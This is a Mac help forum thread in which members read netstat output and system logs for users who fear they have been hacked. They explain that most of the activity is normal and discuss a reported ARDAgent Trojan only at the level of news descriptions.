Munix hacked? Valid files for install of Leopard?

Status
Not open for further replies.
NewMacUser-TX said:
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 0 10.0.1.200.49762 py-in-f83.google.http ESTABLISHED
tcp4 0 0 10.0.1.200.49756 py-in-f19.google.http ESTABLISHED
tcp4 0 0 10.0.1.200.49750 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49749 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49748 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49747 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49746 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49744 a69.26.188.50.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49743 a69.26.188.64.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49741 a69.26.188.41.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49737 64.78.155.105.http ESTABLISHED
tcp4 0 0 10.0.1.200.49735 a69.26.188.58.de.http ESTABLISHED
tcp4 0 0 10.0.1.200.49723 yx-in-f164.googl.http ESTABLISHED
tcp4 0 0 10.0.1.200.49722 yx-in-f164.googl.http ESTABLISHED
tcp4 0 0 localhost.ipp *.* LISTEN
tcp6 0 0 localhost.ipp *.* LISTEN
udp4 0 0 *.* *.*
udp4 0 0 10.0.1.200.ntp *.*
udp6 0 0 thomas-lees-imac.ntp *.*
udp6 0 0 localhost.ntp *.*
udp4 0 0 localhost.ntp *.*
udp6 0 0 localhost.ntp *.*
udp6 0 0 *.ntp *.*
udp4 0 0 *.ntp *.*
udp6 0 0 *.mdns *.*
udp4 0 0 *.mdns *.*
udp4 0 0 *.* *.*
icm6 0 0 *.* *.*
Click to expand...

These are your internet connections to the outside world. Notice that they have an address associated with them. They appear to be connected to google, and you have your network time protocol daemon running.

Nothing to worry about.

Active LOCAL (UNIX) domain sockets
Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
3bf1c38 stream 0 0 0 3bf1880 0 0
3bf1880 stream 0 0 0 3bf1c38 0 0
3bf1660 stream 0 0 0 3bf1990 0 0 /var/run/mDNSResponder
3bf1990 stream 0 0 0 3bf1660 0 0
3235000 stream 0 0 0 3250088 0 0
3250088 stream 0 0 0 3235000 0 0
2e62660 stream 0 0 0 32502a8 0 0
32502a8 stream 0 0 0 2e62660 0 0
3bf1d48 stream 0 0 0 3250aa0 0 0
3250aa0 stream 0 0 0 3bf1d48 0 0
3250e58 stream 0 0 0 32355d8 0 0 /var/run/usbmuxd
32355d8 stream 0 0 0 3250e58 0 0
3250b28 stream 0 0 0 3bf1b28 0 0 /var/run/mDNSResponder
3bf1b28 stream 0 0 0 3250b28 0 0
3250220 stream 0 0 0 3bf1cc0 0 0 /var/run/mDNSResponder
3bf1cc0 stream 0 0 0 3250220 0 0
32507f8 stream 0 0 0 32506e8 0 0 /var/run/mDNSResponder
32506e8 stream 0 0 0 32507f8 0 0
3235ee0 stream 0 0 0 2e624c8 0 0
2e624c8 stream 0 0 0 3235ee0 0 0
3bf1ee0 stream 0 0 0 3250198 0 0
3250198 stream 0 0 0 3bf1ee0 0 0
3bf1f68 stream 0 0 3fec400 0 0 0 /tmp/launch-T9hsEC/:0
3250110 stream 0 0 3fec520 0 0 0 /tmp/launch-T8bJ6T/Listeners
2e62b28 stream 0 0 3fec640 0 0 0 /tmp/launch-IG0YYU/Render
32505d8 stream 0 0 34c1a30 0 0 0 /tmp/launchd-165.93Pw9E/sock
3235330 stream 0 0 0 3235198 0 0
3235198 stream 0 0 0 3235330 0 0
3235110 stream 0 0 0 2e62550 0 0
2e62550 stream 0 0 0 3235110 0 0
3235f68 stream 0 0 0 3250880 0 0
3250880 stream 0 0 0 3235f68 0 0
2e62330 stream 0 0 0 3235908 0 0
3235908 stream 0 0 0 2e62330 0 0
3235770 stream 0 0 0 0 0 0
3235aa0 stream 0 0 0 2e62088 0 0
2e62088 stream 0 0 0 3235aa0 0 0
32352a8 stream 0 0 3490c20 0 0 0 /var/run/pppconfd
3250660 stream 0 0 0 3250550 0 0
3250550 stream 0 0 0 3250660 0 0
3235cc0 stream 0 0 0 3250440 0 0
3250440 stream 0 0 0 3235cc0 0 0
3250990 stream 0 0 0 3250a18 0 0
3250a18 stream 0 0 0 3250990 0 0
3250cc0 stream 0 0 0 3250d48 0 0
3250d48 stream 0 0 0 3250cc0 0 0
3250ee0 stream 0 0 0 3250f68 0 0
3250f68 stream 0 0 0 3250ee0 0 0
3235440 stream 0 0 0 32354c8 0 0
32354c8 stream 0 0 0 3235440 0 0
3235660 stream 0 0 0 32356e8 0 0
32356e8 stream 0 0 0 3235660 0 0
3235bb0 stream 0 0 0 3235c38 0 0
3235c38 stream 0 0 0 3235bb0 0 0
3235dd0 stream 0 0 0 3235e58 0 0
3235e58 stream 0 0 0 3235dd0 0 0
2e62220 stream 0 0 0 2e622a8 0 0
2e622a8 stream 0 0 0 2e62220 0 0
2e627f8 stream 0 0 0 2e62770 0 0
2e62770 stream 0 0 0 2e627f8 0 0
2e62880 stream 0 0 0 2e62990 0 0
2e62990 stream 0 0 0 2e62880 0 0
2e62a18 stream 0 0 0 2e62aa0 0 0
2e62aa0 stream 0 0 0 2e62a18 0 0
2e62c38 stream 0 0 2f570a0 0 0 0 /var/tmp/launchd/sock
2e62cc0 stream 0 0 2f571c0 0 0 0 /private/var/run/cupsd
2e62d48 stream 0 0 2f572e0 0 0 0 /var/run/usbmuxd
2e62e58 stream 0 0 2f57400 0 0 0 /var/run/asl_input
2e62f68 stream 0 0 2f57490 0 0 0 /var/run/portmap.socket
2e62ee0 stream 0 0 2f57520 0 0 0 /var/run/mDNSResponder
3bf13b8 dgram 0 0 0 3bf14c8 3bf14c8 0
3bf14c8 dgram 0 0 0 3bf13b8 3bf13b8 0
3bf1770 dgram 0 0 0 3bf17f8 3bf17f8 0
3bf17f8 dgram 0 0 0 3bf1770 3bf1770 0
3bf1bb0 dgram 0 0 0 2e62dd0 0 32503b8
3250770 dgram 0 0 0 3bf1aa0 3bf1aa0 0
3bf1aa0 dgram 0 0 0 3250770 3250770 0
3250c38 dgram 0 0 0 3235088 3235088 0
3235088 dgram 0 0 0 3250c38 3250c38 0
32357f8 dgram 0 0 0 2e62198 2e62198 0
2e62198 dgram 0 0 0 32357f8 32357f8 0
2e62bb0 dgram 0 0 0 3bf1dd0 3bf1dd0 0
3bf1dd0 dgram 0 0 0 2e62bb0 2e62bb0 0
3250000 dgram 0 0 0 3bf1e58 3bf1e58 0
3bf1e58 dgram 0 0 0 3250000 3250000 0
3235220 dgram 0 0 0 3250bb0 3250bb0 0
3250bb0 dgram 0 0 0 3235220 3235220 0
32503b8 dgram 0 0 0 2e62dd0 0 2e623b8
2e623b8 dgram 0 0 0 2e62dd0 0 3235990
3235990 dgram 0 0 0 2e62dd0 0 32353b8
3235a18 dgram 0 0 0 3235b28 3235b28 0
3235b28 dgram 0 0 0 3235a18 3235a18 0
32353b8 dgram 0 0 0 2e62dd0 0 3235550
3250dd0 dgram 0 0 0 3235880 3235880 0
3235880 dgram 0 0 0 3250dd0 3250dd0 0
3235550 dgram 0 0 0 2e62dd0 0 2e62110
2e62440 dgram 0 0 0 2e626e8 2e626e8 0
2e626e8 dgram 0 0 0 2e62440 2e62440 0
2e62110 dgram 0 0 0 2e62dd0 0 3250330
3250330 dgram 0 0 0 2e62dd0 0 2e62908
2e62908 dgram 0 0 0 2e62dd0 0 0
2e62dd0 dgram 0 0 2f57370 0 3bf1bb0 0 /var/run/syslog

Seems like an awfully lot of connections to me, but then again, I am NOT a net techie.
Click to expand...

And these are your local connections, connections that are made between programs on your machine. Sockets are how Unix programs communicate with one another. On any machine, you will find that there are hundreds if not thousands of such sockets open at any one time.

What you are seeing is perfectly normal.
 
Of course, this exploit requires the hacker to have access to the machine (meaning they have to be sitting in front of the computer, or to have already hacked into your system), or social engineering skills high enough to trick a user into running some application.

The short answer is that for the trojan to be exploited, the user has to explicitly execute a program that takes advantage of this security hole. No current software does this -- it's just a "potential" threat. In addition, a program that DOES exploit this security hole wouldn't be masquerading as the latest FireFox download, a system update, or some pinball game... if you obtain your software from reputable sources, the likelihood of the software containing this trojan is nanometers away from nil.

Maybe we should start at the beginning with these problems and find out what's really wrong...

What abnormal operations of the system that are detrimental to using the computer are occurring?

Have you lost any data (Word files, text files, programs, etc.) due to the abnormal activity?

If you believe your system has been compromised, what have the hackers done with your system (relaying spam, deleting documents, locking you out of the system)?

If any of the above have occurred, what log entries do they coincide with?

If none of the above, could this just all be a question of understanding and interpreting cryptic log entries which seem like they're abnormal, but in fact are benign and normal?

I think it's important to remember that even though you're not clicking and typing on the computer that the computer is going to do a lot of stuff, generate a lot of log entries, do housekeeping on the filesystem, check network connections, and generate warnings and errors (which are normal and handled gracefully), among other things. Just because you don't, for example, renew a DHCP lease manually, your computer may do it for you. Just because you don't explicitly tell the computer to accept a connection from an outside source doesn't mean it's not gonna do it automatically, routinely, and normally. Just because a process is named "Remote Install Assistant" does not mean that some hacker is getting assistance installing stuff on your machine remotely.
 
I recommend that a moderator steps in and closes this thread now. We are either dealing with trolls here, or mentally unstable people. In either case, nothing we say or do is going to settle this.
 
I couldn't agree more. All that has been said to solve this problem has been said. If someone chooses to be paranoid about the processes going on in a computer (especially if those processes are perfectly normal), then let he or she wear the tinfoil hat and let's be done with it. I recommend that those in question look for some reading material on the inner workings or Unix-based operating systems and computer security, if even just for some basic understanding

What the two posters are asking for goes beyond what this thread (or this forum for that matter) can assist with. This thread is running in circles at this point.
 
elander said:
I recommend that a moderator steps in and closes this thread now. We are either dealing with trolls here, or mentally unstable people. In either case, nothing we say or do is going to settle this.
Click to expand...

They could genuinely have a problem. A Mac one, that is...

Personally, I've never seen anything remotely like an exploit on the Mac and nothing I've seen in this thread jumps out at me and strikes me as being a potential exploit.
 
Viro said:
They could genuinely have a problem. A Mac one, that is...

Personally, I've never seen anything remotely like an exploit on the Mac and nothing I've seen in this thread jumps out at me and strikes me as being a potential exploit.
Click to expand...

Then it's time for the original posters to get some reading materials on Mac OS X and some basic Unix-based OS concepts, as well as some basic computer security materials. Again, what's being asked goes beyond the scope of this thread and this forum, IMO.
 
ElDiabloConCaca said:
I think it's important to remember that even though you're not clicking and typing on the computer that the computer is going to do a lot of stuff, generate a lot of log entries, do housekeeping on the filesystem, check network connections, and generate warnings and errors (which are normal and handled gracefully), among other things.
Click to expand...

I think this whole incident does teach me to be really really careful with my code in the future. It tells me that as a software developer, I shouldn *not* liberally sprinkle trace statements in my code which will be captured by the debug console. Sure, those messages only have meaning to me but they mean nothing to others and could potentially panic users should they ever choose to look at the debug log. Also, I need to write less cryptic debug messages. And choose better more descriptive names for my processes.
 
I've firmly secured my tinfoil hat to my head and will scurry off. It's quite rude to suggest that perhaps I'm mentally unstable or a troll, but such is life.

I do thank those of you that have taken time to look over materials and provide guidance. It's appreciated.

I also find it incredible that STILL the really odd log entries are ignored for comment or explanation, yet minor notes are hyped as examples of how ignorant I am of the Unix environment.

Just WHAT was going on with the Airport Extreme base station?

The initial issues for the machine that prompted the paranoia:
- iSight comes on at will.
- File sharing preferences change over time to allow greater access to the machine.
- My admin account privileges are reduced over time. During one go round I was no longer allowed to insert a CD into the optical drive. It would be rejected with an error that I did not have the rights to perform that action.

Can't happen on a Mac, I know.

Wait what's that? I think the FBI's at the door. Gotta go.
 
HelloMac said:
I've firmly secured my tinfoil hat to my head and will scurry off. It's quite rude to suggest that perhaps I'm mentally unstable or a troll, but such is life.

I do thank those of you that have taken time to look over materials and provide guidance. It's appreciated.

I also find it incredible that STILL the really odd log entries are ignored for comment or explanation, yet minor notes are hyped as examples of how ignorant I am of the Unix environment.

Just WHAT was going on with the Airport Extreme base station?

The initial issues for the machine that prompted the paranoia:
- iSight comes on at will.
- File sharing preferences change over time to allow greater access to the machine.
- My admin account privileges are reduced over time. During one go round I was no longer allowed to insert a CD into the optical drive. It would be rejected with an error that I did not have the rights to perform that action.

Can't happen on a Mac, I know.

Wait what's that? I think the FBI's at the door. Gotta go.
Click to expand...

Since you haven't quite left yet (as I see you still viewing the thread as of this writing), I'll take the time to answer.

I looked at your Airport log where you posted that an update to the configuration was not done by you, and it looks as though the configuration of the basestation was changing due to being synchronized through NTP so that the time would be correct. In order to take the changes, I'm guessing that the base station had to unload the currently active configuration and reload it with the updated time information from the NTP server its accessing. It seems to do this in intervals because it's probably checking it in intervals. As for that long list of parameters you say also were not done by you, I can only assume it has something to do with the type of encryption you're using on your base station. There's mention of TKIP, so I'm assuming that you're using either WPA or WPA2.

I hope that you're using a very strong password if you're not using some sort of certificate authentication as would be done using a RADIUS server (please don't ask how to set RADIUS up. Google is your friend for this). If not, then a simple dictionary attack would compromise your base station. Defense in depth is important in keeping your network secure.

I personally think that you and the other poster are making a big deal about normal processes on all your devices. Mind you I could be wrong, but from what everyone has seen and read regarding your problem there is absolutely nothing wrong. As a matter of fact, the log from your MacBook looks as though you were conducting a fresh installation and you're merely highlighing things that, while seemingly foreign to you, are perfectly normal within a Mac OS X installation. If you both are still seriously concerned about this problem, then you both need to take it to the next level and have someone examine your systems and your networks. There's no way anyone here can diagnose something this (seemingly) deep without actually being there with you. For you and NewMacUser-TX, I think it's time to get the direct, hands-on assistance from someone who specializes in computer/network security and have them perform some sort of penetration test for you. If it's that important to you, then the cost should not matter.

Nothing more can be said about this really.....every element that can possibly be done through a forum has been done.

Good luck to the both of you.
 
So, after all this...looks to me like I'm dealing with this...

Researchers spot Mac Trojan In the Wild

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9101898

"The malware exploits a recently publicized vulnerability in the Apple Remote Desktop Agent (ARDAgent), part of Tiger's and Leopard's Remote Management component. Composed as a compiled AppleScript, or in another variant, script bundled into an application, the Trojan leverages the ARDAgent bug to gain full control of the victimized Mac.

"[It] allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging," claimed SecureMac. "Additionally, the Trojan can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing."

SecureMac's warning came one day after an anonymous reader disclosed a few details of the ARDAgent vulnerability on Slashdot.org, and on the same day that rival security vendor Intego provided more information about the bug.

Malicious AppleScript, said Intego, can call ARDAgent, which then gives that script full "root" access to the system. "When an application enables a root privilege escalation of this type, any malicious code that is run may have devastating effects. These may range from deleting all the files on the Mac to more pernicious attacks such as changing system settings, and even setting up periodic tasks to perform them repeatedly," Intego's warning read."

Best to all...
 
"SecureMac, a Mac-specific anti-virus vendor, posted an alert last Thursday that its researchers had found a Trojan horse.." well. That's what the companies that sell antivirus software do. Make you scared and to shed money to their software.

How do you think you had this trojan in place when the system was installed from the retail discs?
 
That exploit was already brought up twice as a possibility, and ElDiabloConCaca already responded about it above:
http://macosx.com/forums/1442876-post82.html

You also failed to mention that the reports given by those antivirus companies specify the following...

From SecureMac:
SecureMac has discovered multiple variants of a new Trojan horse in the wild that affects Mac OS X 10.4 and 10.5. The Trojan horse is currently being distributed from a hacker website, where discussion has taken place on distributing the Trojan horse through iChat and Limewire.

The Trojan horse runs hidden on the system, and allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging. Additionally, the AppleScript.THT Trojan horse can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing. The Trojan horse exploits a recently discovered vulnerability with the Apple Remote Desktop Agent, which allows it to run as root.
Click to expand...

Seems as though this works initially by socially engineering the victim through a rogue file. Have you used anything like Limewire or accessed files from other users through iChat or some other IM client? If you want the help, then you need to honestly share more information. In my experience most of the times, especially in the Windows world, it seems that those that have been compromised in such a way have been using Limewire to download files. I doubt it would be any different just because you're on a Mac (don't believe the marketing hype from the commercials, please....yes, I've been an Apple user since the Apple IIc). Social engineering proves one thing: no matter what system you're running, no matter how many security solutions you've put in place, there's just no patch for human stupidity. (I referred to it as the "human condition" in my previous post, but in reality it's the "human stupidity" in all of us that we need to keep in check.)
 
OMG! I have been hacked (chopped) hacked (chopped) hacked (chopped)....


(butter?.......PARKAY!!!!!!)





::evil::
 
HelloMac said:
So, after all this...looks to me like I'm dealing with this...

Researchers spot Mac Trojan In the Wild

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9101898

"The malware exploits a recently publicized vulnerability in the Apple Remote Desktop Agent (ARDAgent), part of Tiger's and Leopard's Remote Management component. Composed as a compiled AppleScript, or in another variant, script bundled into an application, the Trojan leverages the ARDAgent bug to gain full control of the victimized Mac.

"[It] allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging," claimed SecureMac. "Additionally, the Trojan can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing."

SecureMac's warning came one day after an anonymous reader disclosed a few details of the ARDAgent vulnerability on Slashdot.org, and on the same day that rival security vendor Intego provided more information about the bug.

Malicious AppleScript, said Intego, can call ARDAgent, which then gives that script full "root" access to the system. "When an application enables a root privilege escalation of this type, any malicious code that is run may have devastating effects. These may range from deleting all the files on the Mac to more pernicious attacks such as changing system settings, and even setting up periodic tasks to perform them repeatedly," Intego's warning read."

Best to all...
Click to expand...
If you believe you have been compromised by this trojan, then you would have been required to manually execute an infected application on your hard drive. This application would HAVE to have been downloaded manually, by you, from the internet (in other words, this infected application could NOT be on your system directly after a clean install, and there is no way for someone to "push" the application to you without your knowledge). You would have then had to execute this application manually.

In short, if you are indeed infected by this trojan, then you, yourself, are the one that infected yourself with it. That's social engineering, and there's nothing any anti-virus software can do about it, nor is there anything you can do to your network to prevent it. It's like ramming your head into a wall -- if you don't want a headache, don't ram your head into the wall -- you and only you are in charge of your head.

If you do seriously believe you have been compromised by this trojan, what application did you download from the internet and execute manually directly after a clean Mac OS X installation?
 
Viro said:
I think this whole incident does teach me to be really really careful with my code in the future. It tells me that as a software developer, I shouldn *not* liberally sprinkle trace statements in my code which will be captured by the debug console.
Click to expand...
Heh... precisely why large software developers have "beta" software, which is usually very verbose in logging and useful to the developer, as opposed to "release" versions, which do not spit out spurious messages and are intended for end-users.
 
HelloMac said:
Was using comcast, now Verizon dsl.
Click to expand...
One of your many log posts included some connections that were highlighted by you that included connections to IP addresses, if I am correctly remembering... doing a lookup on those IP addresses yielded information that traced back to Comcast.

I know we've beat this subject to death already, whether resolved or not, but could it be possible that your AirPort (and/or other network devices) is still configured for Comcast settings (gateways, DNS servers, etc.), even though you're using a new service from Verizon? Also, cable modems use a DHCP-style connection, while DSL uses a PPPoE-style connection, which are very different and, basically, "incompatible" for lack of a better work.

If your AirPort is still configured to connect to the Comcast network via DHCP, but you need to connect to Verizon's DSL with a PPPoE connection, then network unhappiness will occur... the results being indeterminable, but definitely problematic.


Hell, people, I'm all about continuing this discussion -- it is moving forward (however slowly), and could result in something good. If not anything, move it to a category more suited for casual discussion instead of closing it. We'll eventually prove one of two things: the posters were lying, or we helped them on a path to resolution.
 
ElDiabloConCaca said:
Heh... precisely why large software developers have "beta" software, which is usually very verbose in logging and useful to the developer, as opposed to "release" versions, which do not spit out spurious messages and are intended for end-users.
Click to expand...

On windows, we have different trace logging levels. We usually have some fairly verbose logging on, since it means that if clients repeatedly run into trouble and crash we can look at their logs and understand what happened. While it sounds bad for performance, we did look at it and found that there wasn't too much of a performance increase (aobut 2% more on a P4 2GHz) so we left it enabled.
 
From the Washington Post today...


http://blog.washingtonpost.com/securityfix/2008/06/new_trojan_leverages_unpatched.html?nav=rss_blog

"...
Dai Zovi said the Trojan tries two different exploits to install itself without having to prompt the user for his or her system credentials. One exploit is the aforementioned ARDagent attack; the other is for a privilege escalation vulnerability that Apple patched in 2006. (As an interesting aside, Dai Zovi himself reported that latter vulnerability to Apple back in 2006, only to later learn that exploit code for that same vulnerability had been publicly posted online prior to Apple issuing a patch for the flaw).


Once installed, the Trojan drops a keystroke logger called "logkext" on the Mac user's system. It then sets up a virtual network computing (VNC) server listening on the victim's machine, which would provide an attacker remote access to the victim's computer.

The code also installs a Web-based "PHP shell" program that allows the attackers to remotely manipulate the infected machine using nothing more than a Web browser. That component of the Trojan also sets the victim's system so that it can be tracked using dynamic DNS services, which permit remote users to remain connected to a system even if its numeric Internet address changes over time. ..."
 
Status
Not open for further replies.
Back
Top